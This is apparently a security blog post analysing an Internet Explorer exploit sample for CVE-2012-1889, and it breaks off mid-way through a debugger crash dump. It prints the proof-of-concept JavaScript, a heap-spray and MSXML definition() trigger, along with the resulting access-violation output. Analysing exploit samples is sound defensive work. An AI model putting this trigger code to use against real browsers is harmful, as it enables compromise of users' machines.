标签归档 » CVE-2012-1889

CVE-2012-1889 exploit sample analysis

Hi, this is a IE exploit sample. I found this in the vt. https://www.virustotal.com/en/file/1df80150284800e82b1dd64579aae71ebce2f6fd44ea37e4c83af287502452ee/analysis/ But I see the detection radio is so low, 12 / 51. many vendor can’t detect this sample. From the vt tag, it seems CVE-2012-1889, and it really an old vulnerability. We also can find the exploit code here: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb Now Let’s look through this sample The poc code is like following: <script type=”text/javascript”>// <![CDATA[ var obj=document.getElementById('puZz').object; var src=unescape("%"+"u0c08"+"%"+"u0c0c"); while(src.length<0x1002)src+=src; src="\\\\xxx"+src; src=src.substr(0,0x1000-10); var pic=document.createElement("img"); pic.src=src; pic.nameProp; obj['definition'](1000); // ]]></script> Now we load the poc in the IE. It crashed. (90c.76c): Access violation – code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0c0c0c08 ebx=00000000 ecx=5dda5dfc …..